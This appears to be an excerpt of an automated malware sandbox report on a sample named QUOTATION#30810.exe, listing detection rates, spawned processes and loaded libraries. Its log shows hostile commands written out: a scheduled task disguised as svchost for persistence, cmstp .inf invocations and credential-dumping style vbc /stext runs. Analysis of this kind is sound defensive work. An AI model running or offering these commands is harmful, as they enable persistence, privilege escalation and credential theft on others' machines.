Source: vbc.exe, vbc.exe, 00000020.00000002.1857899131.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: QUOTATION#30810.exe	ReversingLabs: Detection: 57%
Source: QUOTATION#30810.exe	Virustotal: Detection: 48%

Source: C:\Users\user\Desktop\QUOTATION#30810.exe

File read: C:\Users\user\Desktop\QUOTATION#30810.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Evasive API call chain: __getmainargs,DecisionNodes,exit

Source: unknown	Process created: C:\Users\user\Desktop\QUOTATION#30810.exe "C:\Users\user\Desktop\QUOTATION#30810.exe"
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpDAAA.tmp.bat""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 3
Source: unknown	Process created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\Windows Mail\wab.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 444 -p 5864 -ip 5864
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5864 -s 1120
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 2772 -ip 2772
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2772 -s 1072
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\lmxgukvurszvufgxilvllznhpy"
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\windows\temp\macatsxh.inf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\nglqvdfonaraelcbsvimoeayympwa"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\nglqvdfonaraelcbsvimoeayympwa"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\yiqjvvqpbijnhrqfbgcgyquhzthfbppay"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\windows\temp\54bmrp0l.inf
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 536 -p 6908 -ip 6908
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6908 -s 1076
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\windows\temp\xrlumlnf.inf
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /IM cmstp.exe /F
Source: C:\Windows\System32\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpDAAA.tmp.bat""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 3	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\Windows Mail\wab.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\windows\temp\macatsxh.inf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\lmxgukvurszvufgxilvllznhpy"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\nglqvdfonaraelcbsvimoeayympwa"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\nglqvdfonaraelcbsvimoeayympwa"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\yiqjvvqpbijnhrqfbgcgyquhzthfbppay"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 444 -p 5864 -ip 5864	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5864 -s 1120	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 2772 -ip 2772	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2772 -s 1072	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 536 -p 6908 -ip 6908	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6908 -s 1076	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\System32\WerFault.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\windows\temp\54bmrp0l.inf
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\windows\temp\xrlumlnf.inf
Source: C:\Windows\System32\WerFault.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wersvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windowsperformancerecordercontrol.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: weretw.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: faultrep.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
